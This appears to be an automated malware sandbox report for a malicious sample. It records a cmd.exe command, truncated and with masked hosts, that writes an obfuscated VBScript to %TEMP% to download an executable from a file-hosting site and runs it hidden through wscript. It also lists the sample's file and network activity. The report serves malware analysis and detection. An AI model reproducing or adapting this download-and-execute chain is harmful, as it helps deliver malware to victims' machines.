Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO E3g= "https://www.up##ad.ee/download/12393628/044f534f0df4180f17fc/Bl0x.exe">>U0k.VBS &@ECHO L9q = J7j("h\G^q^")>>U0k.VBS &@ECHO Set D8t = CreateObject(J7j("flqfeKGqfeammi"...
Modifies file system
Creates the following files
- %TEMP%\u0k.vbs
Network activity
TCP
HTTP GET requests
- http://st####.rapidssl.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRhhZrQET0hvbSHUJmNfBKqR%2FiT7wQUU8oXWfxrwAMhLxqu5KqoHIJW2nUCEAffP8uXPz%2BbuVistZM%2BMKI%3D
- http://cd#.##pidssl.com/RapidSSLRSACA2018.crl
UDP
- DNS ASK up##ad.ee
- DNS ASK st####.rapidssl.com
- DNS ASK cd#.##pidssl.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\wscript.exe' "%TEMP%\U0k.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO E3g= "https://www.up##ad.ee/download/12393628/044f534f0df4180f17fc/Bl0x.exe">>U0k.VBS &@ECHO L9q = J7j("h\G^q^")>>U0k.VBS &@ECHO Set D8t = CreateObject(J7j("flqfeKGqfeammi"...' (with hidden window)
